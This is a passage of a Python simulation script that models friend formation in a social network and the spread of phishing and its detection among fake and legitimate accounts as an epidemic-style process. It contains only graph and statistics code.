if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False and G.nodes[j]['edges'] < 7:
node_list0[k] = product_matrix[min(j, k)][max(j, k)]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
#select top 1 value
while flag == 0:
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
del node_list[f]
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): #update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): #updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
pending = friend_pending(G)
random.shuffle(pending)
#after 5 times
for i in list(G.nodes()): #update sc and trust values
social_capital_trust_update(G, i)
print(G.size())
return G
'''Update capital data from G and plot probability distribution'''
def post_process(G, capital, i, method, dname, out):
# print stats
print(method, 'Edges:', G.size())
print(method, 'Non-full nodes:',
len([n for n, v in G.nodes(data=True) if v['full'] == False])) # print none full nodes
print(method, 'Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
# Add social capital values to capital
capital_return(capital, G, 'edges')
capital_return(capital, G, 'STC')
capital_return(capital, G, 'CC')
capital_return(capital, G, 'RC')
capital_return(capital, G, 'SC')
print('# SC=0: ', sum(capital['SC'] == 0.0))
# # Draw probability distribution
# if i == 0 and method == 'SC':
# fitting_post(capital, dname, 'cognitive', method, 50, out)
# fitting_post(capital, dname, 'relational', method, 50, out)
# fitting_post(capital, dname, 'human', method, 50, out)
# fitting_post(capital, dname, 'RH', method, 50, out)
# fitting_post(capital, dname, 'RHC', method, 50, out)
# fitting_post(capital, dname, 'edges', method, 50, out)
# fitting_post(capital, dname, 'SC', method, 50, out)
# fitting_post(capital, dname, 'STC', method, 50, out)
# fitting_post(capital, dname, 'CC', method, 50, out)
# fitting_post(capital, dname, 'RC', method, 50, out)
# elif i == 0:
# fitting_post(capital, dname, 'edges', method, 50, out)
# fitting_post(capital, dname, 'SC', method, 50, out)
# fitting_post(capital, dname, 'STC', method, 50, out)
# fitting_post(capital, dname, 'CC', method, 50, out)
# fitting_post(capital, dname, 'RC', method, 50, out)
#print SC values
for feature in ['STC', 'CC', 'RC', 'SC']:
if dname == 'Cresci15':
with open('resultcres/' + out + '/' + feature + '_' + method + '.txt', 'a') as f:
f.write(str(G.nodes(data=feature)) + '\n')
elif dname == '1ks10kn':
with open('result1ks/' + out + '/' + feature + '_' + method + '.txt', 'a') as f:
f.write(str(G.nodes(data=feature)) + '\n')
return capital
'''Defense for four social deception attacks'''
def defense(G, atta, i, records, j): # j:attacker, i:target, f:friends
start_time = time.time()
#random.seed(j)
random.seed(int(start_time))
G.nodes[i][atta] = 'E'
flag = True
# defense: detect and post to friends
cred = math.exp(-G.nodes[j]['deception']/(G.nodes[i]['competence']*G.nodes[i]['experience']))
if cred >= random.random():
G.nodes[i][atta] = 'R'
G.nodes[i]['experience'] = G.nodes[i]['experience'] + 1
records['sir'][i] = records['sir'][i] + 1
flag = False
# post to friends
if G.nodes[i]['posting'] >= random.random(): # small chance to post
for f in list(G.neighbors(i)):
# friends increase the experience of attackers
if f and not isinstance(G.nodes[j][atta], int):
G.nodes[f]['experience'] = G.nodes[f]['experience'] + 1
else: # defense: fail to detect and ask for friend
if G.nodes[i]['posting'] >= random.random(): # small chance to post
for f in list(G.neighbors(i)):
# friend comment back to help detect
if f and (G.nodes[f][atta] == 'S' or G.nodes[f][atta] == 'R') and G.nodes[f]['feedback'] >= random.random():
cred_f = math.exp(-G.nodes[j]['deception'] / (G.nodes[f]['competence'] * G.nodes[f]['experience']))
if cred_f >= random.random():
records['ir'][i] = records['ir'][i] + 1
G.nodes[i][atta] = 'R'
G.nodes[i]['experience'] = G.nodes[i]['experience'] + 1
G.nodes[f]['experience'] = G.nodes[f]['experience'] + 1
flag = False
break
return flag
'''Attack find the targets'''
def interaction_ATTACK(G, likers, dname, atta, j, pas, records, i):
start_time = time.time()
rnd = int(i * 10)
seed(rnd)
# one-time attack-defense-update
neighbors = list(G.neighbors(j))
f_list = [x for x, y in G.nodes(data=True) if (not isinstance(G.nodes[x][atta], int) and x in neighbors)]
random.shuffle(f_list)
victims = math.ceil(len(f_list) * pas)
if len(f_list) == 0:
return G
elif atta == 'phish': # phishing: select at random
targets = choice(f_list, victims, replace=False) # attack p_as percent friends
if type(targets) is list or type(targets) is np.ndarray:
count_i = 0
count_a = 0
for target in targets:
if G.nodes[target][atta] == 'S' or G.nodes[target][atta] == 'E':
count_a = count_a + 1
# defense: detect and post to friends/ fail to detect and ask for friend
flag = defense(G, atta, target, records, j)
records['i'][target] = records['i'][target] + 1
if flag == True: # Infected
count_i = count_i + 1
G.edges[j, target]['f'] = G.edges[j, target]['f'] + 1
G.edges[j, target]['b'] = G.edges[j, target]['b'] + 1
else: #defense successful
G.nodes[j][atta] = G.nodes[j][atta] + 1 #report the attacker
if G.nodes[j]['label'] == True:
G.remove_edge(j, target) #terminate friendship with compromised account
else:
G.edges[j, target]['f'] = G.edges[j, target]['f'] + 1
else: # R user can ignore the attack and report it
G.nodes[j][atta] = G.nodes[j][atta] + 1
G.nodes[target]['experience'] = G.nodes[target]['experience'] + 1
else: # scalar
print("ERROR")
return G
'''Update SIR for four attacks after one interaction time'''
def sir_process_update(G, attack_sir, run, feat, i):
adding = 100
snum = len([x for x, y in G.nodes(data=True) if y['phish'] == 'S'])
enum = len([x for x, y in G.nodes(data=True) if y['phish'] == 'E'])
inum = len([x for x, y in G.nodes(data=True) if (y['phish'] == 0 and y['label'] == 'Legit')])
rnum = len([x for x, y in G.nodes(data=True) if y['phish'] == 'R'])
sir = snum + inum + rnum + enum
attack_sir[(i-adding)*4] = snum / sir
attack_sir[(i-adding)*4+1] = inum / sir
attack_sir[(i-adding)*4+2] = rnum / sir
attack_sir[(i - adding) * 4 + 3] = enum / sir
'''Update SIR for four attacks after one interaction time'''
def sir_state_change(records, attack_state, i):
adding = 100
attack_state[(i-adding) * 4] = len([(x,y) for x,y in records['i'].items() if y>0])
attack_state[(i-adding) * 4 + 1] = len([x for x,y in records['sr'].items() if y>0])
attack_state[(i-adding) * 4 + 2] = len([x for x,y in records['ir'].items() if y>0])
attack_state[(i-adding) * 4 + 3] = len([x for x,y in records['sir'].items() if y>0])
'''Simulate time-series behaviors of users-- Social capital dimensions'''
def interaction_SC(G, dname, likers, feature, p_as, run, attack_sir, attack_state, attack_report, feat):
start_time = time.time()
rnd = int(start_time)
print("run seed:", rnd)
random.seed(rnd)
#recording attacks
records = {}
records['i'] = {no: 0 for no in G.nodes()}
records['sr'] = {no: 0 for no in G.nodes()}
records['ir'] = {no: 0 for no in G.nodes()}
records['sir'] = {no: 0 for no in G.nodes()}
invite = {no: 0 for no in G.nodes()}
for _, y in G.nodes(data=True):
attack = 'phish'
if y['label'] == 'Legit':
y[attack] = 'S'
else:
y[attack] = 0
size_prev = G.size()
for i in range(105):
size_invite = 0
if i < 100: # inviting friends only
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
###
edge_cur = [0 for x in pending] #can change to attribute of G
for j in pending:
idx_j = pending.index(j)
limit_j = G.nodes[j]['edge_interaction']
if G.nodes[j]['full'] == True:
continue
###
a = random.random()
if G.nodes[j]['inviting'] >= a:
size_invite = size_invite + 1
invite[j] = invite[j] + 1
# find all possible k
friend_j = list(G.neighbors(j))
list_k = deepcopy(pending)
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = G.nodes[k][feature]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1 or 10/20
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
length = len(ranked)
# #select top 1 value
while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['label'] == 'Legit' and G.nodes[j][feature] < 1.0 * node_list[f]:
del node_list[f]
continue
if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
edge_cur[idx_j] = edge_cur[idx_j] + 1
edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
del node_list[f]
size_prev = G.size()
full_nodes_new = set(G.nodes()) - set(friend_pending(G))
full_nodes_iter = full_nodes_new - full_nodes
# print(G.size())
if i < 80:
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): # update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
# update sc values after each run
for j in list(G.nodes()):
social_capital_update(G, j)
else: # attack and defense
nodes = list(G.nodes())
random.shuffle(nodes)
for j in nodes:
if isinstance(G.nodes[j]['phish'], int):
G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
# stats collection
count = 0 # reported attackers
for j in nodes:
if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3:
count = count + 1
attack_report[i-100] = count
sir_state_change(records, attack_state, i)
# post-attack updates: attacker report
for j in nodes:
if isinstance(G.nodes[j]['phish'], int): #attackers
# removed the reported attackers from the network/ compromised user back to S
if G.nodes[j]['phish'] >= 3:
if G.nodes[j]['label'] == True: # compromised account
G.nodes[j]['phish'] = 'R' # change password
G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
else: # remove the attacker
nb = list(G.neighbors(j))
for k in nb:
G.remove_edge(j, k)
else: #normal users
if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #E to attacker I, compromised account
G.nodes[j]['phish'] = 0 #20% chance to be compromised accounts
sir_process_update(G, attack_sir, run, feat, i) #update S E I R
# printing
if i == 100:
invite_times = {}
invite_friends = {}
for x in sorted(invite.keys()):
if invite[x] > 0:
invite_times[x] = invite[x]
invite_friends[x] = G.nodes[x]['friends']
print(len(invite_times))
if (i + 1) % 20 == 0:
print("%s edges at %d :%d" % (feature, i, G.size()))
print((time.time() - start_time) / 60)
sum = 0
diff = 0
fake_edges = {}
fake_friends = {}
for x in G.nodes():
if G.nodes[x]['label'] == 'Fake':
diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
sum = sum + G.nodes[x]['friends']
fake_edges[x] = G.nodes[x]['edges']
fake_friends[x] = G.nodes[x]['friends']
print("sum of fake friends:", sum)
print("sumdiff of fake friends:", diff)
return G
'''Simulate time-series behaviors of users-- Topics similarity'''
def interaction_TP(G, dname, likers, topics, p_as, run, attack_sir, attack_state, attack_report, feat):
start_time = time.time()
rnd = int(start_time)
print("run seed:", rnd)
random.seed(rnd)
#recording attacks
records = {}
records['i'] = {no: 0 for no in G.nodes()}
records['sr'] = {no: 0 for no in G.nodes()}
records['ir'] = {no: 0 for no in G.nodes()}
records['sir'] = {no: 0 for no in G.nodes()}
invite = {no: 0 for no in G.nodes()}
#random.seed(int(start_time))
for _, y in G.nodes(data=True):
for attack in ['phish', 'falseinfo', 'profile', 'humanatt']:
if y['label'] == 'Legit':
y[attack] = 'S'
else:
y[attack] = 0
# adjacency matrix to save similarity
size = max(G.nodes()) + 1
product_matrix = np.zeros((size, size))
for x in G.nodes():
dot_x = topics.loc[x]
for y in G.nodes():
if y > x:
dot_y = topics.loc[y]
mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
product_matrix[x][y] = mut
size_prev = G.size()
for i in range(105):
size_invite = 0
if i < 100: # inviting friends only
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
edge_cur = [0 for x in pending] #can change to attribute of G
for j in pending:
idx_j = pending.index(j)
limit_j = G.nodes[j]['edge_interaction']
if G.nodes[j]['full'] == True:
continue
###
a = random.random()
if G.nodes[j]['inviting'] >= a:
size_invite = size_invite + 1
invite[j] = invite[j] + 1
# find all possible k
friend_j = list(G.neighbors(j))
list_k = deepcopy(pending)
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = product_matrix[min(j, k)][max(j, k)]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['label'] == 'Legit':
tp_max = 0
for k in G.neighbors(f):
if tp_max < product_matrix[min(f, k)][max(f, k)]:
tp_max = product_matrix[min(f, k)][max(f, k)]
if node_list[f] < 0.2 * tp_max:
del node_list[f]
continue
###
if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
edge_cur[idx_j] = edge_cur[idx_j] + 1
edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
del node_list[f]
size_prev = G.size()
full_nodes_new = set(G.nodes()) - set(friend_pending(G))
full_nodes_iter = full_nodes_new - full_nodes
if i < 80:
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): # update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
# update sc values after each run
for j in list(G.nodes()):
social_capital_update(G, j)
else: # attack and defense
nodes = list(G.nodes())
random.shuffle(nodes)
for j in nodes:
if isinstance(G.nodes[j]['phish'], int):
G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
# stats collection
count = 0 # reported attackers
for j in nodes:
if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3: #deception == 2.5
count = count + 1
attack_report[i-100] = count
sir_state_change(records, attack_state, i)
# post-attack updates: attacker report and user transformation
for j in nodes:
if isinstance(G.nodes[j]['phish'], int): #attackers
# removed the reported attackers from the network/ compromised user back to S
if G.nodes[j]['phish'] >= 3:
if G.nodes[j]['label'] == True: # compromised account
G.nodes[j]['phish'] = 'R' # change password
G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
else: # remove the attacker
nb = list(G.neighbors(j))
for k in nb:
G.remove_edge(j, k)
else: #normal users
if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
G.nodes[j]['phish'] = 0
sir_process_update(G, attack_sir, run, feat, i)
# printing
if i == 100:
invite_times = {}
invite_friends = {}
for x in sorted(invite.keys()):
if invite[x] > 0:
invite_times[x] = invite[x]
invite_friends[x] = G.nodes[x]['friends']
print(len(invite_times))
if (i + 1) % 20 == 0:
print("TP edges at %d :%d" % (i, G.size()))
print((time.time() - start_time) / 60)
sum = 0
diff = 0
fake_edges = {}
fake_friends = {}
for x in G.nodes():
if G.nodes[x]['label'] == 'Fake':
diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
sum = sum + G.nodes[x]['friends']
fake_edges[x] = G.nodes[x]['edges']
fake_friends[x] = G.nodes[x]['friends']
print("sum of fake friends:", sum)
print("sumdiff of fake friends:", diff)
return G
'''Simulate time-series behaviors of users-- Social attributes'''
def interaction_SA(G, dname, likers, p_as, run, attack_sir, attack_state, attack_report, feat):
start_time = time.time()
rnd = int(start_time)
print("run seed:", rnd)
random.seed(rnd)
#recording attacks
records = {}
records['i'] = {no: 0 for no in G.nodes()}
records['sr'] = {no: 0 for no in G.nodes()}
records['ir'] = {no: 0 for no in G.nodes()}
records['sir'] = {no: 0 for no in G.nodes()}
invite = {no: 0 for no in G.nodes()}
#random.seed(int(start_time))
for _, y in G.nodes(data=True):
for attack in ['phish', 'falseinfo', 'profile', 'humanatt']:
if y['label'] == 'Legit':
y[attack] = 'S'
else:
y[attack] = 0
# adjacency matrix to save similarity
size = max(G.nodes()) + 1
product_matrix = np.zeros((size, size))
for x in G.nodes():
dot_x = [G.nodes[x]['human'], G.nodes[x]['cognitive'], G.nodes[x]['relational']]
for y in G.nodes():
if y > x:
dot_y = [G.nodes[y]['human'], G.nodes[y]['cognitive'], G.nodes[y]['relational']]
mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
product_matrix[x][y] = mut
size_prev = G.size()
for i in range(105):
size_invite = 0
if i < 100: # inviting friends only
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
edge_cur = [0 for x in pending] #can change to attribute of G
for j in pending:
idx_j = pending.index(j)
limit_j = G.nodes[j]['edge_interaction']
if G.nodes[j]['full'] == True:
continue
a = random.random()
if G.nodes[j]['inviting'] >= a:
size_invite = size_invite + 1
invite[j] = invite[j] + 1
# find all possible k
friend_j = list(G.neighbors(j))
list_k = deepcopy(pending)
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = product_matrix[min(j, k)][max(j, k)]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['label'] == 'Legit':
as_max = 0
for k in G.neighbors(f):
if as_max < product_matrix[min(f, k)][max(f, k)]:
as_max = product_matrix[min(f, k)][max(f, k)]
if node_list[f] < 0.6 * as_max:
del node_list[f]
continue
if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
edge_cur[idx_j] = edge_cur[idx_j] + 1
edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
del node_list[f]
size_prev = G.size()
full_nodes_new = set(G.nodes()) - set(friend_pending(G))
full_nodes_iter = full_nodes_new - full_nodes
if i<80:
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): # update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
# update sc values after each run
for j in list(G.nodes()):
social_capital_update(G, j)
else: # attack and defense
nodes = list(G.nodes())
random.shuffle(nodes)
for j in nodes:
if isinstance(G.nodes[j]['phish'], int):
G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
# stats collection
count = 0 # reported attackers
for j in nodes:
if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3: #deception == 2.5
count = count + 1
attack_report[i-100] = count
sir_state_change(records, attack_state, i)
# post-attack updates: attacker report and user transformation
for j in nodes:
if isinstance(G.nodes[j]['phish'], int): #attackers
# removed the reported attackers from the network/ compromised user back to S
if G.nodes[j]['phish'] >= 3:
if G.nodes[j]['label'] == True: # compromised account
G.nodes[j]['phish'] = 'R' # change password
G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
else: # remove the attacker
nb = list(G.neighbors(j))
for k in nb:
G.remove_edge(j, k)
else: #normal users
if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
G.nodes[j]['phish'] = 0
sir_process_update(G, attack_sir, run, feat, i)
# printing
if i == 100:
invite_times = {}
invite_friends = {}
for x in sorted(invite.keys()):
if invite[x] > 0:
invite_times[x] = invite[x]
invite_friends[x] = G.nodes[x]['friends']
print(len(invite_times))
if (i + 1) % 20 == 0:
print("SA edges at %d :%d" % (i, G.size()))
print((time.time() - start_time) / 60)
sum = 0
diff = 0
fake_edges = {}
fake_friends = {}
for x in G.nodes():
if G.nodes[x]['label'] == 'Fake':
diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
sum = sum + G.nodes[x]['friends']
fake_edges[x] = G.nodes[x]['edges']
fake_friends[x] = G.nodes[x]['friends']
print("sum of fake friends:", sum)
print("sumdiff of fake friends:", diff)
return G
'''Simulate time-series behaviors of users-- Trust friend'''
def interaction_TR(G, dname, likers, feature, p_as, run, attack_sir, attack_state, attack_report, feat):
start_time = time.time()
rnd = int(start_time)
print("run seed:", rnd)
random.seed(rnd)
# recording attacks
records = {}
records['i'] = {no: 0 for no in G.nodes()}
records['sr'] = {no: 0 for no in G.nodes()}
records['ir'] = {no: 0 for no in G.nodes()}
records['sir'] = {no: 0 for no in G.nodes()}
invite = {no: 0 for no in G.nodes()}
# set SIR(legit) or reported time(attacker)
for _, y in G.nodes(data=True):
for attack in ['phish']:
if y['label'] == 'Legit':
y[attack] = 'S' #for legit users
else:
y[attack] = 0 #for attackers
# Dynamic interactions
size_prev = G.size()
for i in range(105):
size_invite = 0
if i < 100: # no attacks
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
edge_cur = [0 for x in pending] #can change to attribute of G
for j in pending:
idx_j = pending.index(j)
limit_j = G.nodes[j]['edge_interaction']
if G.nodes[j]['full'] == True:
continue
a = random.random()
if G.nodes[j]['inviting'] >= a:
size_invite = size_invite + 1
invite[j] = invite[j] + 1
# find all possible k
friend_j = list(G.neighbors(j))
list_k = deepcopy(pending)
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = G.nodes[k]['trust']
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
if edge_cur[pending.index(k)] < G.nodes[k]['edge_interaction']:
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
length = len(ranked)
# select top 1 value
while edge_cur[idx_j] < limit_j or (edge_cur[idx_j] == limit_j and flag == 0):
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['label'] == 'Legit' and G.nodes[j]['trust'] < 1.0 * node_list[f]: #i > 20 and
del node_list[f]
continue
if edge_cur[pending.index(f)] < G.nodes[f]['edge_interaction'] and G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
edge_cur[idx_j] = edge_cur[idx_j] + 1
edge_cur[pending.index(f)] = edge_cur[pending.index(f)] + 1
del node_list[f]
size_prev = G.size()
full_nodes_new = set(G.nodes()) - set(friend_pending(G))
full_nodes_iter = full_nodes_new - full_nodes
if i < 80:
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): # update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): # updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
# update sc and trust values after each run
for j in list(G.nodes()):
social_capital_trust_update(G, j)
else: # attack and defense
nodes = list(G.nodes())
random.shuffle(nodes)
for j in nodes:
# if j not in G.nodes():
# continue
if isinstance(G.nodes[j]['phish'], int):
G = interaction_ATTACK(G, likers, dname, 'phish', j, p_as, records, i) # phishing
# stats collection
count = 0 # reported attackers
for j in nodes:
if G.nodes[j]['label'] == 'Fake' and G.nodes[j]['phish'] >= 3:
count = count + 1
attack_report[i-100] = count
sir_state_change(records, attack_state, i)
# post-attack updates: attacker report and user transformation
for j in nodes:
if isinstance(G.nodes[j]['phish'], int): #attackers
# removed the reported attackers from the network/ compromised user back to S
if G.nodes[j]['phish'] >= 3:
if G.nodes[j]['label'] == True: # compromised account
G.nodes[j]['phish'] = 'R' # change password
G.nodes[j]['experience'] = G.nodes[j]['experience'] + 1
else: # remove the attacker
nb = list(G.neighbors(j))
for k in nb:
G.remove_edge(j, k)
else: #normal users
if G.nodes[j]['phish'] == 'E' and random.random() <= 0.2: #I to attacker, compromised account
G.nodes[j]['phish'] = 0
sir_process_update(G, attack_sir, run, feat, i)
# printing
if i == 100:
invite_times = {}
invite_friends = {}
for x in sorted(invite.keys()):
if invite[x] > 0:
invite_times[x] = invite[x]
invite_friends[x] = G.nodes[x]['friends']
print(len(invite_times))
if (i + 1) % 20 == 0:
print("%s edges at %d :%d" % (feature, i, G.size()))
print((time.time() - start_time) / 60)
sum = 0
diff = 0
fake_edges = {}
fake_friends = {}
for x in G.nodes():
if G.nodes[x]['label'] == 'Fake':
diff = diff + abs(G.nodes[x]['friends'] - G.nodes[x]['edges'])
sum = sum + G.nodes[x]['friends']
fake_edges[x] = G.nodes[x]['edges']
fake_friends[x] = G.nodes[x]['friends']
print("sum of fake friends:", sum)
print("sumdiff of fake friends:", diff)
return G
def RC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=0):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('RC:')
G = initial_friend_SC(G, 'relational', i, dname)
print('RC:')
print('Full ratio:', len([n for n, v in G.nodes(data=True) if v['full'] == True]) / G.order())
G = interaction_SC(G, dname, likers, 'RC', p_as, i, attack_sir, attack_state, attack_report, feat)
capital = post_process(G, capital, i, 'RC', dname, out)
def STC(sample, capital_full, G_full, likers, p_as, i, attack_sir, attack_state, attack_report, dname, out, feat=1):
capital = capital_full.loc[sorted(sample)]
G = nx.Graph(G_full.subgraph(sorted(sample)))
print('STC:')
